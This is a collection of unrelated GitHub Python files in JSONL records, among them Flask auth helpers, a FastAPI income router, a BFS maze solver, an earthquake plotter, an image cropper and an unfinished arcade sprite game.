user.has_access(region, api):\n return True\n else:\n if abort:\n abort_request()\n else:\n return False\n else:\n if abort:\n abort_request()\n else:\n return False\n\ndef abort_request():\n \"\"\"\n abort a request with the proper http status in case of authentification issues\n \"\"\"\n if get_user():\n flask_restful.abort(403)\n else:\n flask_restful.abort(401)\n\ndef has_access(instance, abort=False):\n if 'PUBLIC' in current_app.config \\\n and current_app.config['PUBLIC']:\n #if jormungandr is on public mode we skip the authentification process\n return True\n res = instance.is_accessible_by(get_user())\n if abort and not res:\n abort_request()\n else:\n return res\n\ndef get_user(abort_if_no_token=True):\n \"\"\"\n return the current authenticated User or None\n \"\"\"\n if hasattr(g, 'user'):\n return g.user\n else:\n token = get_token()\n if not token:\n #a token is mandatory for non public jormungandr\n if not current_app.config.get('PUBLIC', False):\n if abort_if_no_token:\n flask_restful.abort(401)\n else:\n return None\n else: # for public one we allow unknown user\n g.user = User(login=\"unknown_user\")\n g.user.id = 0\n else:\n g.user = User.get_from_token(token, datetime.datetime.now())\n\n logging.debug('user %s', g.user)\n\n return g.user\n","repo_name":"morphalus/navitia","sub_path":"source/jormungandr/jormungandr/authentification.py","file_name":"authentification.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"21894747188","text":"from sqlalchemy.orm import Session\nfrom typing import Union, List\n\nfrom common.constants import QUEUE_CURRENT\n\nfrom ..models import BuildQueueModel\n\n\n__all__ = [\"info_already_saved\", \"current_build_info\",\n \"get_all_queues\", \"get_queue_by_id\", \"delete_by_id\", \"set_metro_pid\", \"set_process_id\"]\n\n\ndef info_already_saved(session: Session, commit_hash: str) -> bool:\n \"\"\"Function to check if the commit data is already saved in DB or not\n\n Args:\n session (Session): sqlalchemy session\n commit_hash (str): commit hash\n\n Returns:\n bool: returns True if the data already exists in DB else False\n \"\"\"\n exists = session.query(BuildQueueModel).filter(\n BuildQueueModel.commit_hash == commit_hash).exists()\n exists = session.query(exists).scalar()\n return exists\n\n\ndef current_build_info(session: Session) -> Union[None, BuildQueueModel]:\n \"\"\"Function to get currently building process info\n\n Args:\n session (Session): sqlalchemy session\n\n Returns:\n Union[None, BuildQueueModel]: returns None if no current build process running else returns the data\n \"\"\"\n data = session.query(BuildQueueModel).filter(\n BuildQueueModel.queue_status == QUEUE_CURRENT).first()\n return data\n\n\ndef get_all_queues(session: Session) -> List[BuildQueueModel]:\n \"\"\"Function to get all the data inside BuildQueue Table\n\n Args:\n session (Session): sqlalchemy session\n\n Returns:\n Union[None, List[BuildQueueModel]]: returns None if the table is empty else returns List of data\n \"\"\"\n data = session.query(BuildQueueModel).all()\n return data\n\n\ndef get_queue_by_id(session: Session, id: int) -> Union[None, BuildQueueModel]:\n \"\"\"Function to get queue data by queue id\n\n Args:\n session (Session): sqlalchemy session\n id (int): queue id \n\n Returns:\n Union[None, BuildQueueModel]: returns data if exists else None\n \"\"\"\n data = session.query(BuildQueueModel).get(id)\n return data\n\n\ndef delete_by_id(session: Session, id: int):\n \"\"\"Function to delete queue data by id\n\n Args:\n session (Session): sqlalchemy session\n id (int): queue id\n \"\"\"\n data = session.query(BuildQueueModel).get(id)\n session.delete(data)\n session.commit()\n\n\ndef set_metro_pid(session: Session, commit_hash: str, pid: int):\n \"\"\"Function to save metro server process id to DB\n\n Args:\n session (Session): sqlalchemy session\n commit_hash (str): commit hash\n pid (int): process id\n \"\"\"\n data = session.query(BuildQueueModel).filter(\n BuildQueueModel.commit_hash == commit_hash).first()\n\n data.metro_pid = pid\n session.commit()\n\n\ndef set_process_id(session: Session, commit_hash: str, pid: int):\n \"\"\"Function to save running process id eg. \"pod install\", \"yarn install\" etc\n\n Args:\n session (Session): sqlalchemy session\n commit_hash (str): commit hash\n pid (int): process id\n \"\"\"\n data = session.query(BuildQueueModel).filter(\n BuildQueueModel.commit_hash == commit_hash).first()\n\n data.process_pid = pid\n session.commit()\n","repo_name":"SameerNaing/auto-build","sub_path":"db/helpers/buildQueueModelHelpers.py","file_name":"buildQueueModelHelpers.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"635991915","text":"# (1,1)에서 (N,M)의 위치로 이동할 때 지나야 하는 최소의 칸 수\n# 한 칸에서 다른 칸으로 이동할 때, 서로 인접한 칸으로만 이동할 수 있다\n# 40분 ~\nfrom collections import deque\n\nn, m = map(int, input().split())\n# 최소의 칸 수\n# bfs \ndx = [-1, 1, 0, 0] # 상 하 좌 우\ndy = [0, 0, -1, 1] # 상 하 좌 우\n# (n,m)\n\ndef bfs(graph, a, b):\n q = deque() # 방문한 지점을 append \n q.append((a, b))\n # 이렇게 1을 찾을 때마다 1을 더해준다면 전체 1의 갯수를 출력하는 것이지\n # 미로를 탈출했을 때의 지나온 1의 갯수를 출력해주는 게 아님 \n # 그래서 1이 보일 때마다 count에 1을 더해주면 안된다. \n # graph[a][b] = 0\n # count += 1 \n\n while q:\n x, y = q.popleft()\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n # 위치가 벗어나면 안되기 때문에 조건 추가 \n if nx < 0 or nx >= n or ny < 0 or ny >= m:\n continue\n\n # 벽이므로 진행 불가\n if graph[nx][ny] == 0:\n continue\n\n # 벽이 아니므로 이동 \n if graph[nx][ny] == 1:\n q.append((nx, ny))\n graph[nx][ny] = graph[x][y] + 1\n #graph[nx][ny] = 0\n #count += 1\n \n return graph[n-1][m-1]\n\nmiro = []\nfor i in range(n):\n miro.append(list(map(int, input()))) \n\n\nprint(bfs(miro, 0, 0))\nprint(miro)","repo_name":"sihyeon3523/Algorithm","sub_path":"Algorithm_Study/bj2178.py","file_name":"bj2178.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25433541813","text":"import os\r\nimport glob\r\nfrom datetime import datetime, timedelta\r\nimport time\r\nimport numpy as np\r\nimport json\r\nimport geopy.distance\r\nimport urllib.request\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport math\r\nimport getseiscoords\r\n\r\ntimesave = False\r\n\r\ndef plotquakes(start,end):\r\n #download and parse geojson from USGS\r\n \r\n def converttime(inputtime,zone,beginorend,timeformat,timesave=None):\r\n if beginorend == 'begin':\r\n inputtime = starttime_s - (60*60*24)\r\n else: \r\n inputtime = starttime_s + (60*60*24)\r\n if zone == 'UTC':\r\n inputtime = datetime.utcfromtimestamp(inputtime)\r\n else:\r\n inputtime = datetime.fromtimestamp(inputtime)\r\n if timeformat == 'url':\r\n inputtime = inputtime.strftime(\"%Y%m%d_%H%M\")\r\n elif timeformat == 'USGS':\r\n inputtime = inputtime.strftime(\"%Y-%m-%dT%H:%M:%S\")\r\n else: \r\n inputtime = inputtime.strftime(\"%Y-%m-%d %H:%M:%S\")\r\n return inputtime\r\n \r\n urltime_start = []\r\n urltime_end = []\r\n urltime = []\r\n \r\n urltime_start = converttime(urltime_start,'UTC','begin','USGS')\r\n urltime_end = converttime(urltime_end,'UTC','end','USGS')\r\n urltime = converttime(urltime,'local','begin','url')\r\n titletime = converttime(urltime,'local','begin','title')\r\n \r\n #request url format \r\n #https://earthquake.usgs.gov/fdsnws/event/1/query?format=geojson&starttime=2014-01-01&endtime=2014-01-02&minmagnitude=1.5\r\n print('Getting data from USGS')\r\n \r\n urlUSGS = 'https://earthquake.usgs.gov/fdsnws/event/1/query?format=geojson&starttime=' #start of url\r\n urlUSGS = urlUSGS + urltime_start + '&endtime=' + urltime_end + '&minmagnitude=1.5' #append times based on above calculations\r\n \r\n #open from url\r\n #format: two digit mag_length of time.geojson\r\n #with urllib.request.urlopen(\"https://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/1.0_week.geojson\") as url:\r\n #data = json.loads(url.read().decode()) #read geojson file\r\n \r\n with urllib.request.urlopen(urlUSGS) as url: \r\n data = json.loads(url.read().decode()) #read geojson file\r\n \r\n \r\n #parse features in data\r\n print('Reformatting USGS data')\r\n quakelist = []\r\n quakeplottime = []\r\n quakeplotdist = []\r\n quakeplotmag = []\r\n quakeplotdepth = []\r\n quakeplotlogdepth = []\r\n detectablequakedist = []\r\n detectablequaketime = []\r\n for feature in data['features']:\r\n i = []\r\n i.append(feature['properties']['place']) #place name\r\n i.append(feature['geometry']['coordinates']) #coordinates on earth\r\n seismag = feature['properties']['mag']\r\n i.append(seismag) #moment magnitude\r\n \r\n seistime = (feature['properties']['time'])/1000\r\n i.append(seistime) #earthquake initiation time \r\n \r\n earthquakecoords = feature['geometry']['coordinates'] \r\n quakedepth = earthquakecoords[2]\r\n earthquakecoords = [earthquakecoords[1],earthquakecoords[0]] #remove depth\r\n seiscoords = getseiscoords() #seismometer location\r\n seisdist = round(geopy.distance.geodesic(earthquakecoords, seiscoords).km)\r\n if quakedepth > (seisdist / 10): #if depth is large relative to distance of quake\r\n seisdist = math.sqrt((quakedepth ** 2) + (seisdist ** 2))\r\n i.append(seisdist) #distance between earthquake and seismometer, rounded to nearest km\r\n seisdeltat = abs((seisdist/2)-60) #time difference between earthquake and expected arrival\r\n if (seistime + seisdeltat) > endtime_s:\r\n continue #if earthquake is expected to arrive after end of recording\r\n if (seistime + seisdeltat) < starttime_s:\r\n continue #if earthquake is expected to arrive before beginning of recording\r\n i.append(seisdeltat+seistime) #earthquake arrival time relative to start of program (i.e. referenced to timems)\r\n \r\n if 8 * math.exp((0.535 * seismag)) > seisdist:\r\n detectablequakedist.append(seisdist)\r\n detectablequaketime.append(seistime)\r\n \r\n quakelist.append(i) #append above to list of earthquakes in machine-readable form\r\n \r\n quakeplottime.append(seistime)\r\n quakeplotdist.append(seisdist)\r\n quakeplotmag.append(seismag)\r\n quakeplotlogdepth.append(-np.log(abs(quakedepth) + 0.001))\r\n quakeplotdepth.append(quakedepth)\r\n \r\n fig = plt.figure()\r\n ax = Axes3D(fig)\r\n ax.scatter(quakeplottime,quakeplotdist,quakeplotmag,c=quakeplotdepth,s=10)\r\n #s=quakeplotmag makes dots too small and hard to distinguish\r\n ax.set_ylabel('Distance (km)')\r\n ax.set_xlabel('Seconds since epoch')\r\n ax.set_zlabel('Magnitude')\r\n plt.title(titletime)\r\n plt.show\r\n if timesave == True:\r\n plt.savefig(urltime + 'earthquakemap.png')\r\n return(quakelist)\r\n\r\n#Approximate filesizes\r\nfor file in glob.glob(r\"C:\\*.csv\"):\r\n sizefile = os.path.getsize(file)/1000\r\n starttime_s = os.path.getctime(file)\r\n endtime_s = (sizefile / 14.9) + starttime_s\r\n plotquakes(starttime_s,endtime_s,timesave=False)\r\n","repo_name":"Dilong-paradoxus/Seismometer","sub_path":"plot_quakes.py","file_name":"plot_quakes.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33561758793","text":"\"\"\"A robot moves in a plane starting from the original point (0,0). The robot can move toward UP, DOWN, LEFT and RIGHT. program to compute the distance from current position after a sequence of movement and original point. If the distance is a float, then just print the nearest integer\"\"\"\n\n#import math \n\nimport math\n#initiate the robot position\npos = [0,0]\nwhile True:\n s = input()\n if not s:\n break\n#movement can be split using whitespace\n\n movement = s.split(\" \")\n direction = movement[0]\n steps = int(movement[1])\n if direction==\"UP\":\n pos[0]+=steps\n elif direction==\"DOWN\":\n pos[0]-=steps\n elif direction==\"LEFT\":\n pos[1]-=steps\n elif direction==\"RIGHT\":\n pos[1]+=steps\n else:\n pass\n#calculate the traveling position and print the answer \n\nprint(int(round(math.sqrt(pos[1]**2+pos[0]**2))))\n","repo_name":"Saranya-sharvi/saranya-training-prgm","sub_path":"exc-pgm/robotmath.py","file_name":"robotmath.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24311128551","text":"import openpyxl\nimport os\n\n# os.getcwd()\n# os.chdir() # change working directory\n# os.path.abspath('.')\n# os.listdir()\n# os.path.getsize('excel/example.xlsx')\n\nwb = openpyxl.load_workbook('excel/example.xlsx')\n# wb.sheetnames\nsheet = wb['Sheet1']\n\n# sheet['A1'].value # datetime.datetime(2015, 4, 5, 13, 34, 2)\n# sheet['B1'].value # 'Apples'\n\nfor i in range(1, 8):\n a = sheet.cell(row=i, column=1).value\n b = sheet.cell(row=i, column=2).value\n print(a, b)\n","repo_name":"aleksmn/PyAutomateStuff","sub_path":"excel_spreadsheets.py","file_name":"excel_spreadsheets.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14205920184","text":"import os\nfrom PIL import Image\nfrom tqdm import tqdm\n\ndef find_bounding_box(image, alpha_threshold=50):\n pixels = image.load()\n min_x, min_y = image.size\n max_x = max_y = 0\n\n for x in range(image.width):\n for y in range(image.height):\n if pixels[x, y][3] >= alpha_threshold:\n min_x = min(min_x, x)\n min_y = min(min_y, y)\n max_x = max(max_x, x)\n max_y = max(max_y, y)\n\n return (min_x, min_y, max_x, max_y)\n\ndef find_bounding_box_rgb(image, color_difference_threshold=50):\n bg_color = image.getpixel((0, 0))\n min_x, min_y = image.size\n max_x = max_y = 0\n\n for x in range(image.width):\n for y in range(image.height):\n pixel_color = image.getpixel((x, y))\n color_difference = sum(abs(bg_color[i] - pixel_color[i]) for i in range(3))\n\n if color_difference >= color_difference_threshold:\n min_x = min(min_x, x)\n min_y = min(min_y, y)\n max_x = max(max_x, x)\n max_y = max(max_y, y)\n \n return (min_x, min_y, max_x, max_y)\n\ndef crop_image(image):\n if image.mode == \"RGBA\":\n bbox = find_bounding_box(image)\n else:\n bbox = find_bounding_box_rgb(image)\n return image.crop(bbox)\n\nscript_dir = os.path.dirname(os.path.abspath(__file__))\n\ninput_directory = os.path.join(script_dir, \"images\")\noutput_directory = os.path.join(script_dir, \"processed\")\n\nif not os.path.exists(output_directory):\n os.makedirs(output_directory)\n\nimage_extensions = [\".bmp\", \".gif\", \".jpg\", \".jpeg\", \".png\", \".tif\", \".tiff\", \".webp\"]\nimage_files = [f for f in os.listdir(input_directory) if any(f.endswith(ext) for ext in image_extensions)]\n\nwith tqdm(total=len(image_files), desc=\"Processing images\") as pbar:\n for filename in image_files:\n filepath = os.path.join(input_directory, filename)\n image = Image.open(filepath)\n cropped_image = crop_image(image)\n \n output_filepath = os.path.join(output_directory, filename)\n cropped_image.save(output_filepath)\n pbar.update(1)","repo_name":"ComicDansMS/crop-images","sub_path":"crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7234290225","text":"class Ventilador:\n def __init__(self, cor, potencia, tensao, preco):\n self.preco = preco\n self.__cor = cor\n self.__potencia = potencia\n self.__tensao = tensao\n self.__ligado = False\n\n def cor(self):\n return self.__cor\n\n\nclass Batedeira:\n def __init__(self, cor, potencia, tensao, preco):\n self.preco = preco\n self.__cor = cor\n self.__potencia = potencia\n self.__tensao = tensao\n self.__ligado = False\n\n def cor(self):\n return self.__cor\n\n\nclass Pessoa:\n def __init__(self, nome, saldo_na_conta):\n self.nome = nome\n self.saldo_na_conta = saldo_na_conta\n self.ventilador = None\n\n def comprar_ventilador(self, ventilador):\n if ventilador.preco <= self.saldo_na_conta:\n self.saldo_na_conta -= ventilador.preco\n self.ventilador = ventilador\n\n def comprar_batedeira(self, batedeira):\n if batedeira.preco <= self.saldo_na_conta:\n self.saldo_na_conta -= batedeira.preco\n self.batedeira = batedeira\n\n def __str__(self):\n if (self.ventilador or self.batedeira):\n return f\"{self.nome} - possui um novo produt.\"\n return f\"{self.nome} - não possui um novo produto.\"\n\n\nventilador_branco = Ventilador(\"branco\", potencia=250, tensao=220, preco=100)\npessoa = Pessoa(\"Maria\", saldo_na_conta=2000)\npessoa.comprar_ventilador(ventilador_branco)\n\n\nventilador_branco = Batedeira(\"pink\", potencia=240, tensao=110, preco=2250)\npessoa = Pessoa(\"Pedro\", saldo_na_conta=5000)\npessoa.comprar_ventilador(ventilador_branco)\n\nventilador_branco = Batedeira(\"preta\", potencia=1100, tensao=110, preco=6250)\npessoa = Pessoa(\"Betinho\", saldo_na_conta=10000)\npessoa.comprar_ventilador(ventilador_branco)\n\nprint(pessoa)\n","repo_name":"BenHurAlbertassi12/CienciaDaInformacao","sub_path":"padroesDeProjeto/Dia1/exercicio_composicao.py","file_name":"exercicio_composicao.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14253710904","text":"from fastapi import APIRouter, HTTPException, Depends\nfrom dbmanagement.manage_db import *\nfrom utils import signJWT, decodeJWT, checkChild\nfrom bearer import JWTBearer\n\n\nrouter = APIRouter()\ne404 = HTTPException(status_code=404, detail=\"Data not found\")\n\n\ndb = Db(\"home_budget\", True)\nconn = sqlite3.connect(\"home_budget.db\")\nc = conn.cursor()\n\n\n@router.post(\"/Incomes\", tags=[\"Income\"], dependencies=[Depends(JWTBearer())])\nasync def post_income(\n walletId: int,\n userId: int,\n amount: float,\n date: str,\n category: str,\n name: str | None = None,\n token: dict = Depends(JWTBearer()),\n):\n checkChild(userId, decodeJWT(token)[\"user_id\"])\n wallets_ownerships = db.get(\"WalletOwnership\")\n\n if (walletId, userId) not in wallets_ownerships:\n raise HTTPException(\n status_code=217,\n detail=\"Cannot add income. User/wallet does not exist or user is not the owner of the wallet.\",\n )\n\n db.insert(\"Income\", [walletId, userId, amount, date, category, name])\n\n conn.commit()\n\n return {\n \"walletId\": walletId,\n \"userId\": userId,\n \"amount\": amount,\n \"date\": date,\n \"category\": category,\n \"name\": name,\n }\n\n\n@router.get(\"/Incomes\", tags=[\"Income\"], dependencies=[Depends(JWTBearer())])\nasync def get_income(\n userId: int,\n id: int,\n token: dict = Depends(JWTBearer()),\n):\n checkChild(userId, decodeJWT(token)[\"user_id\"])\n ids = c.execute(f\"SELECT id FROM Income\").fetchall()\n ids = [x for tpl in ids for x in tpl]\n\n if id not in ids:\n raise HTTPException(\n status_code=217,\n detail=\"No such income in incomes (wrong id).\",\n )\n\n income = c.execute(f\"SELECT * FROM Income WHERE id = {id}\").fetchall()\n\n data = {}\n data[\"walletId\"] = income[0][1]\n data[\"userId\"] = income[0][2]\n data[\"amount\"] = income[0][3]\n data[\"date\"] = income[0][4]\n data[\"category\"] = income[0][5]\n data[\"name\"] = income[0][6]\n\n return data\n\n\n@router.put(\"/Incomes\", tags=[\"Income\"], dependencies=[Depends(JWTBearer())])\nasync def put_income(\n userId: int,\n id: int,\n amount: float,\n date: str,\n name: str | None = None,\n token: dict = Depends(JWTBearer()),\n):\n checkChild(userId, decodeJWT(token)[\"user_id\"])\n ids = c.execute(f\"SELECT id FROM Income\").fetchall()\n ids = [x for tpl in ids for x in tpl]\n\n if id not in ids:\n raise HTTPException(\n status_code=217,\n detail=\"No such income in incomes (wrong id).\",\n )\n\n c.execute(\n f\"UPDATE Income SET amount = {amount} and date = '{date}' and name = '{name}' WHERE id = {id}\"\n )\n conn.commit()\n\n return {\"amount\": amount, \"date\": date, \"name\": name}\n\n\n@router.delete(\"/Incomes\", tags=[\"Income\"], dependencies=[Depends(JWTBearer())])\nasync def delete_income(\n userId: int,\n id: int,\n token: dict = Depends(JWTBearer()),\n):\n checkChild(userId, decodeJWT(token)[\"user_id\"])\n ids = c.execute(f\"SELECT id FROM Income\").fetchall()\n ids = [x for tpl in ids for x in tpl]\n\n if id not in ids:\n raise HTTPException(\n status_code=217,\n detail=\"No such income in incomes (wrong id).\",\n )\n\n c.execute(f\"DELETE FROM Income WHERE id = {id}\")\n conn.commit()\n\n return \"Deleted successfully\"\n","repo_name":"akopij70/HomeBudgetApp","sub_path":"routers/income.py","file_name":"income.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38334824849","text":"\r\n\r\ndef numertoworld(numerinput):\r\n units = [\"\", \"Vienas\", \"Du\", \"Trys\", \"Keturi\", \"Penki\", \"Šeši\", \"Septyni\", \"Aštuoni\", \"Devyni\"]\r\n tens = [\"\", \"Dešimt\", \"Dvidešimt\", \"Trisdešimt\", \"Keturiasdešimt\", \"Penkiasdešimt\", \"Šešiasdešimt\", \"Septyniasdešimt\", \"Aštuoniasdešimt\", \"Devyniasdešimt\"]\r\n hundreds = [\"\", \"Šimtas\", \"Dviejų šimtų\", \"Trejų šimtų\", \"Keturių šimtų\", \"Penkių šimtų\", \"Šešių šimtų\", \"Septynių šimtų\", \"Aštuonių šimtų\", \"Devynių šimtų\"]\r\n \r\n # Separate the integer and decimal parts\r\n \r\n\r\n# Remove the Euro symbol\r\n \r\n number = str(numerinput).replace('€', '')\r\n parts = number.split('.')\r\n \r\n if len(parts) == 1: \r\n integer_part = int(parts[0])\r\n decimal_part = 0\r\n elif len(parts) == 2: \r\n integer_part = int(parts[0])\r\n decimal_part = int(parts[1])\r\n else:\r\n raise ValueError(\"Invalid number format\")\r\n\r\n \r\n euras = \"eurai\" if integer_part % 10 in [1, 2, 3] else \"eura\" if integer_part % 10 == 4 else \"euru\"\r\n\r\n\r\n integer_text = \"\"\r\n decimal_text = \"\"\r\n if integer_part >= 5:\r\n if integer_part == 0:\r\n decimal_text = numertoworld(decimal_part) + \" centų\"\r\n elif integer_part < 10:\r\n integer_text = units[integer_part] + \" \" + euras\r\n elif integer_part < 100:\r\n integer_text = tens[integer_part // 10] + \" \" + units[integer_part % 10] + \" \" + euras\r\n else:\r\n integer_text = (\r\n hundreds[integer_part // 100]\r\n + \" \"\r\n + numertoworld(integer_part % 100)\r\n + \" \"\r\n + euras\r\n )\r\n \r\n if decimal_part > 0:\r\n decimal_text = numertoworld(decimal_part) + \" centų\"\r\n\r\n return f\"{integer_text} ir {decimal_text}\" if decimal_part > 0 else integer_text","repo_name":"NeLagina/Projektas-Latvis","sub_path":"modules/numertoworld.py","file_name":"numertoworld.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"lt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30761232071","text":"import os\n\nr, w = os.pipe()\nreader = open(r)\nwriter = open(w, 'w')\n\nif os.fork() == 0:\n print(\"Child have read: \", reader.read(5))\nelse:\n writer.write(\"Hello!\")\nfor x, xname in [(reader, \"reader\"), (writer, \"writer\")]:\n print(xname + \"is readable? \", x.readable())\n print(xname + \"is writable?\", x.writable())\n print(xname + \"is seekable?\", x.seekable())\n","repo_name":"kakkoyun/cmpe322","sub_path":"Exercises/Exercise.py","file_name":"Exercise.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9943765920","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'countingValleys' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER steps\n# 2. STRING path\n#\n\ndef countingValleys(steps, path):\n # Write your code here\n d = {}\n l = [path[0]]\n countvalley = 0\n\n for i in range(1, steps):\n c=0\n if len(l)==1 and l[0]==\"D\":\n c=1\n if len(l)==0 or path[i] == l[-1]:\n l.append(path[i])\n else:\n l.pop()\n if c==1 and len(l)==0:\n countvalley+=1\n return countvalley\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n steps = int(input().strip())\n\n path = input()\n\n result = countingValleys(steps, path)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"GizawAAiT/Competitive_programming","sub_path":"Community/week 1/numbers of valley.py","file_name":"numbers of valley.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"41960304719","text":"'''\nSPRITE GAME\n-----------\nHere you will start the beginning of a game that you will be able to update as we\nlearn more in upcoming chapters. Below are some ideas that you could include:\n\n1.) Find some new sprite images.\n2.) Move the player sprite with arrow keys rather than the mouse. Don't let it move off the screen.\n3.) Move the other sprites in some way like moving down the screen and then re-spawning above the window.\n4.) Use sounds when a sprite is killed or the player hits the sidewall.\n5.) See if you can reset the game after 30 seconds. Remember the on_update() method runs every 1/60th of a second.\n6.) Try some other creative ideas to make your game awesome. Perhaps collecting good sprites while avoiding bad sprites.\n7.) Keep score and use multiple levels. How do you keep track of an all time high score?\n8.) Make a two player game.\n\n'''\n\nimport random\nimport arcade\n\n# --- Constants ---\nBB8_scale = 0.6\ntrooper_scale = 0.1\ntrooper_count = 15\nSW = 800\nSH = 600\nSP = 4\nLevelTime = 30\n\n\nclass Player(arcade.Sprite):\n def __init__(self):\n super().__init__(\"Images/bb8.png\", BB8_scale)\n self.laser = arcade.load_sound(\"game_assets/Sounds/coin.wav\")\n self.grounded = False\n self.slowing = False\n\n def slowdown(self):\n if self.change_x > 0: #or self.change_x < 0:\n self.change_x = self.change_x * 0.9\n if self.change_x < 0.5:\n self.change_x = 0\n self.slowing = False\n if self.change_x < 0: #or self.change_x < 0:\n self.change_x = self.change_x * 0.9\n if self.change_x > -0.5:\n self.change_x = 0\n self.slowing = False\n\n def update(self):\n global LevelTime\n if self.grounded!=True:\n self.change_y -= (8/60)\n else:\n self.change_y = 0\n\n self.center_x += self.change_x\n self.center_y += self.change_y\n\n if self.change_y > 6:\n self.change_y = 6\n\n if self.left < 0:\n self.left = 0\n #arcade.play_sound(self.laser)\n elif self.right > SW:\n self.right = SW\n #arcade.play_sound(self.laser)\n if self.top < 0:\n LevelTime = -1\n #arcade.play_sound(self.laser)\n elif self.top > SH:\n self.top = SH\n #arcade.play_sound(self.laser)\n\n if self.slowing == True:\n if self.grounded == True:\n self.slowdown()\n\n\n\n\nclass Trooper(arcade.Sprite):\n def __init__(self):\n self.textureframe = 0\n super().__init__()\n self.w = int(self.width)\n self.h = int(self.height)\n self.angle = 0\n self.scale = 0.2\n\n #self.draw_hit_box()\n\n #self.textureframe = 0\n self.texture_list = []\n texture = arcade.load_texture(\"game_assets/Coins/frame_0.gif\")\n self.texture_list.append(texture)\n texture = arcade.load_texture(\"game_assets/Coins/frame_1.gif\")\n self.texture_list.append(texture)\n texture = arcade.load_texture(\"game_assets/Coins/frame_2.gif\")\n self.texture_list.append(texture)\n texture = arcade.load_texture(\"game_assets/Coins/frame_3.gif\")\n self.texture_list.append(texture)\n texture = arcade.load_texture(\"game_assets/Coins/frame_4.gif\")\n self.texture_list.append(texture)\n texture = arcade.load_texture(\"game_assets/Coins/frame_5.gif\")\n self.texture_list.append(texture)\n self.texture = texture\n\n\n def update(self):\n self.center_y += -1\n\n def update_animation(self, delta_time: float = 1/12):\n #print(\"test\")\n self.textureframe += 1\n if self.textureframe > 5:\n self.textureframe = 0\n self.texture = self.texture_list[self.textureframe]\n\nclass Backround():\n def __init__(self, speed,x,y,h):\n self.speed = speed\n self.x = x\n self.y = y\n self.inx = x\n self.h = h\n\n def drawmount(self):\n if self.x > -200 and self.x < 1000:\n arcade.draw_rectangle_filled(self.x,self.y,self.h,self.h,arcade.color.GREEN,45)\n arcade.draw_rectangle_outline(self.x, self.y, self.h, self.h, arcade.color.GRAY,1,45)\n\n def updatemont(self):\n #self.x += self.speed\n if self.x < -200:\n self.x = random.randint(1000,1200)\n\nclass World(arcade.Sprite):\n def __init__(self,texpath):\n self.texturepath = texpath\n super().__init__(self.texturepath, 1)\n self.laser = arcade.load_sound(\"game_assets/Sounds/coin.wav\")\n\n def update(self):\n pass\n\n\n\n#------MyGame Class--------------\nclass MyGame(arcade.Window):\n\n def __init__(self,SW,SH,title):\n self.time = 0\n self.cooldown = 0\n self.ct = 0\n super().__init__(SW, SH, title)\n self.set_mouse_visible(False)\n self.set_vsync(True)\n arcade.set_background_color(arcade.color.SKY_BLUE)\n\n def reset(self):\n global LevelTime\n LevelTime = 30\n\n\n #this is the list of the grass blocks\n self.worldlist = arcade.SpriteList() #floor\n for i in range(int(SW / 32)):\n self.floor = World(\"game_assets/worldtiles/grass.png\")\n self.floor.center_x = (32 / 2) + (32 * i)\n self.floor.center_y = 80 -16\n self.worldlist.append(self.floor)\n\n for i in range(int(SW / 32)):\n self.floor = World(\"game_assets/worldtiles/grass.png\")\n self.floor.center_x = (32 / 2) + (32 * i)\n self.floor.center_y = 420\n self.worldlist.append(self.floor)\n\n for i in range(int(SW / 32)):\n self.floor = World(\"game_assets/worldtiles/grass.png\")\n self.floor.center_x = (32 / 2) + (32 * i)\n self.floor.center_y = 600\n self.worldlist.append(self.floor)\n\n for i in range(int(300 / 32)): #lower Platform\n self.floor = World(\"game_assets/worldtiles/grass.png\")\n self.floor.center_x = (32 / 2) + (32 * i)\n self.floor.center_y = 200\n self.worldlist.append(self.floor)\n\n for i in range(int(300 / 32)): #Upper Platform\n self.floor = World(\"game_assets/worldtiles/grass.png\")\n self.floor.center_x = (32 / 2) + (32 * i) + 400\n self.floor.center_y = 320\n self.worldlist.append(self.floor)\n\n for i in range(int(SW / 32)):\n self.floor = World(\"game_assets/worldtiles/Dirt1.png\")\n self.floor.center_x = (32 / 2) + (32 * i)\n self.floor.center_y = 80 -16 -32\n self.worldlist.append(self.floor)\n\n self.player_list = arcade.SpriteList()\n self.trooper_list = arcade.SpriteList()\n\n self.backlist = []\n for i in range(25):\n background = Backround(-0.5, random.randint(-200, 1000), 0, random.randint(50, 200))\n self.backlist.append(background)\n\n self.score = 0\n\n self.BB8 = Player()\n self.BB8.center_x = SW / 2\n 